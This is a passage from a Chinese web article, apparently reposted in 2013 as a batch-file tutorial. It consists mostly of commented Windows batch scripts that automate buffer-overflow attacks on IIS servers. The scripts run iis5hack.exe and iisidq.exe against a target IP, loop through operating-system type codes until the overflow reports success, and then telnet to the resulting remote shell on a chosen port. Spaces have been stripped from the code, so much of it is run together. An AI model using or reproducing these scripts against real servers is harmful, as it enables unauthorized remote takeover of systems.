经过整理的一些dos/bat批处理教程
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
| 1为没有发现0为发现并成功执行) iis5hack%180988|find"good"/*开始溢出目标端口80系统代码9溢出后连接端口88在执行结果中发现字符串”good”(溢出成功后才会有字符串good) ifnoterrorlevel1gototelnet/*如果没有错误代码1(溢出成功)就执行telnet段的内容。 echo操作系统类型9失败!/否则显示这一句 :8/*以下代码内容参照上面 iis5hack%180888|find"good" ifnoterrorlevel1gototelnet echo操作系统类型8失败! :7 iis5hack%180788|find"good" ifnoterrorlevel1gototelnet echo操作系统类型7失败! :6 iis5hack%180688|find"good" ifnoterrorlevel1gototelnet echo操作系统类型6失败! :5 iis5hack%180588|find"good" ifnoterrorlevel1gototelnet echo操作系统类型5失败! :4 iis5hack%180488|find"good" ifnoterrorlevel1gototelnet echo操作系统类型4失败! :3 iis5hack%180388|find"good" ifnoterrorlevel1gototelnet echo操作系统类型3失败! :2 iis5hack%180288|find"good" ifnoterrorlevel1gototelnet echo操作系统类型2失败! :1 iis5hack%180188|find"good" ifnoterrorlevel1gototelnet echo操作系统类型1失败! :0 iis5hack%180088|find"good" ifnoterrorlevel1gototelnet echo操作系统类型0失败! gotoerror :telnet telnet%188/*开始连接目标ip的88端口 gotoexit/*连接中断后跳转exit段 :error/*error段显示错误后的帮助信息 echo可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次! echoiis5hack[目标IP][WEB端口][系统类型][开放端口] ECHO中文:0 ECHO中文+sp1:1 ECHO英文:2 ECHO英文+sp1:3 ECHO日语:4 ECHO日语+sp1:5 ECHO韩文:6 ECHO韩文+sp1:7 ECHO墨西哥语:8 ECHO墨西哥语+sp1:9 gotoexit/*跳转exit段 :file/*file段显示文件没有发现的信息 echo文件iis5hack.exe没有发现!程序终止运行! gotoexit/*跳转exit段 :help/*help段显示本批处理的使用格式帮助 echo本程序用法如下: echoiis[目标ip] echoiis[目标ip][开始的号码9-0] :exit/*exit段为程序出口 这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大! 例二 这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下: 运行参数:操作系统类型目的地址web端口1溢出监听端口<输入命令1> 其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。 其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为<idq.bat目标ip>程序如下: @echooff/*同例一 ifnotEXISTiisidq.exegotofile/*同例一 if%1==""gotoerror/*同例一 ping%1-n1|find"Received=1"/*同例一 iferrorlevel1gotoerror1/*同例一 setb=%1/*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip seta=0/*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。 :no/*no段开始 if%a%==0setd=0/*如果环境变量a=0则创建环境变量d设定环境变量d=0。 if%a%==1setd=1/*环境变量d其实是操作系统类型代码,用计数器来控制其 if%a%==2setd=2/*变动。 if%a%==3setd=3 if%a%==4setd=4 if%a%==5setd=5 if%a%==6setd=6 if%a%==7setd=7 if%a%==9setd=9 if%a%==10setd=13 if%a%==11setd=14 goto0/*变量传递完成后转到标志0处运行 :1 echo正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候...... :0/*标志0开始 IISIDQ%d%%b%80199|find"good"/*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good) iferrorlevel1goto1/*如果没有good字符串则没有发送成跳 /*转标志1处继续尝试发送 ping127.0.0.1- |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: 妙用脚本和批处理清除电脑中的痕迹下一篇: 最强的用批处理编写的病毒
关于经过整理的一些dos/bat批处理教程的所有评论
